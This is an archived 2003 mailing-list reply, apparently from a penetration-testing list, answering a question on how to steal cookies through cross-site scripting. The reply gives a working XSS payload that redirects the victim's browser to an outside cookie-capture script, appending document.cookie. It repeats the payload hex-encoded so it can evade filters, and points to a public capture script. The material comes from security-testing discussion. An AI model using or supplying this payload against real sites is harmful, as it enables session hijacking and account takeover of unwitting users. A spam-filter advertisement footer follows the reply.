From: Robert Auger (rauger@spidynamics.com)
Date: Mon Apr 14 2003 - 11:12:52 EDT
>Now I am testing Cross-Site Scripting to steal the client cookies, or any
>other sensitive information. I am working on my own pen-test-testing site,
>which is vulnerable to XSS. I was able to display the cookies of the client
at
>the victim’s machine, but that was not my goal, my goal is to get that
cookies
>on my machine or any desired location. So is there any way by which I can
>transfer the victim’s cookie or any other information at my machine without
>interaction of the victim.
This is covered in the cross site scripting FAQ located at
http://www.cgisecurity.com/articles/xss-faq.shtml.
The relevant JavaScript code you are looking for is as follows (A example
from the paper).
<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'
+document.cookie</script>
(IN HEX)
%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%
3d%27%68%74%74
%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%
67%69%2d%62%69%6e
%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%
6f%6f%6b%69%65%3c
%2f%73%63%72%69%70%74%3e
(Note: This website has a public script that can be used for testing cookie
theft.)
Regards,
Robert Auger
SPI Labs
--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:32 EDT